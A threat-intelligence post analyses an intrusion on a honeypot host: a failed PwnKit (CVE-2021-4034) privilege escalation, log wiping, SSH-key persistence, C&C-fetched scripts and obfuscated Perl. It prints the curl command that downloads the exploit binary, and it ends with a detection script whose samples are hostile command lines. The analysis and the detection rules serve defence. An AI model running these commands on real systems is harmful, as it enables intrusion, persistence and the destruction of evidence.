Russia and Ukraine are staring at each other across the abyss. Tensions that began in 2014 following the Russian annexation of Crimea from Ukraine are fueling the border crisis today. In this post, we're going to analyze an attack we discovered last week that appears to be Russian actors attempting to use a deception host to attack Ukrainian infrastructure. This attempt at privilege escalation could have had serious results if it had been successful. After failing to escalate privileges, the attacker left a loop of code running that, every second, executed a curl command against a Ukrainian government web page. The technique is worth noting, and this action on our deception environment could also represent a larger-scale effort on the part of the attackers.

To see our team talk about the intel uncovered, watch this on-demand webinar.

Polkit is a component for controlling systemwide privileges in Unix operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. The CVE-2021-4034 vulnerability is a memory corruption vulnerability that allows unprivileged users to run commands as privileged users according to predefined policies. This vulnerability was discovered by the Qualys Research Team.

The attackers accessed the server via SSH from the TOR network and started looking at what the server contained by executing the following commands:

    $ id

Then, they downloaded a GitHub repository called CVE-2021-4034 to exploit the Polkit pkexec vulnerability and try to elevate their privileges (1). They also tried to exploit that vulnerability with the following Linux ELF binary (2) (e483074bbe5e41cacbe081f290d7e6b0c3184c7f):

    $ curl -fsSL hxxps:///ly4k/PwnKit/main/PwnKit -o PwnKit

When they saw they couldn't exploit that vulnerability because the host wasn't vulnerable to CVE-2021-4034, they tried to delete their evidence by writing an empty character to the log files and deleting the previous scripts.

To gain persistence, and to secure the weak SSH access for themselves, they added their RSA public key to the user's .ssh/authorized_keys file, and then changed the user's password. After gaining persistence, they executed some system discovery commands.

Then, they created and executed a Python script named привет.py (3). This script just downloaded another Python script, информация.py, from their C&C and executed it. This second script, информация.py, obtains information about the host (4).

The next step was the creation of another Perl file by piping a long Base64 string that decodes into an eval(unpack(...)) Perl command, a classic method of obfuscation.
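The behaviours described above (PwnKit download, log truncation, authorized_keys persistence, password change, Base64-to-interpreter obfuscation, and the one-second curl loop) are each visible in recorded command lines. The following is an added example, not code from the post, that triages a constructed set of such command lines against rules for exactly those actions; the sample commands, the placeholder URL and the placeholder Base64 blob are assumptions made for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample of command lines, modelled on the actions the post describes.
# These are NOT captured from the incident; URLs and blobs are placeholders.
SAMPLE_COMMANDS = [
    "id",
    "curl -fsSL hxxps://EXAMPLE-PLACEHOLDER/PwnKit -o PwnKit",
    "chmod +x PwnKit",
    "echo '' > /var/log/auth.log",
    "echo 'ssh-rsa AAAA-PLACEHOLDER attacker' >> /home/user/.ssh/authorized_keys",
    "passwd user",
    "echo 'BASE64-PLACEHOLDER' | base64 -d | perl",
    "while true; do curl -s http://example.invalid/ >/dev/null; sleep 1; done",
    "ls -la /opt",
]

# One rule per behaviour from the post: (label, regex). Deliberately narrow, so a
# hit points at the specific action rather than at 'curl' or 'echo' in general.
RULES = [
    ("persistence: authorized_keys modified", re.compile(r"\.ssh/authorized_keys")),
    ("persistence: password changed", re.compile(r"(^|\s)passwd(\s|$)")),
    ("defense evasion: log file truncated", re.compile(r">\s*/var/log/\S+")),
    ("privilege escalation: PwnKit/CVE-2021-4034 tooling",
     re.compile(r"PwnKit|CVE-2021-4034", re.IGNORECASE)),
    ("obfuscation: base64 decoded into an interpreter",
     re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(perl|python\d?|sh|bash)(\s|$)")),
    ("impact: tight curl loop", re.compile(r"while\s+true.*curl.*sleep\s+1")),
]


def classify(command: str) -> List[str]:
    """Return every rule label that matches a single command line."""
    return [label for label, rx in RULES if rx.search(command)]


def triage(commands: List[str]) -> Dict[str, List[str]]:
    """Group the command lines under each matching label; benign lines are dropped."""
    hits: Dict[str, List[str]] = {}
    for cmd in commands:
        for label in classify(cmd):
            hits.setdefault(label, []).append(cmd)
    return hits


if __name__ == "__main__":
    for label, cmds in triage(SAMPLE_COMMANDS).items():
        print(f"{label}: {cmds}")
```

Feeding real auditd execve records or shell history through `triage` instead of `SAMPLE_COMMANDS` gives the same grouping; a host showing the persistence, evasion and loop labels together is the pattern this post describes.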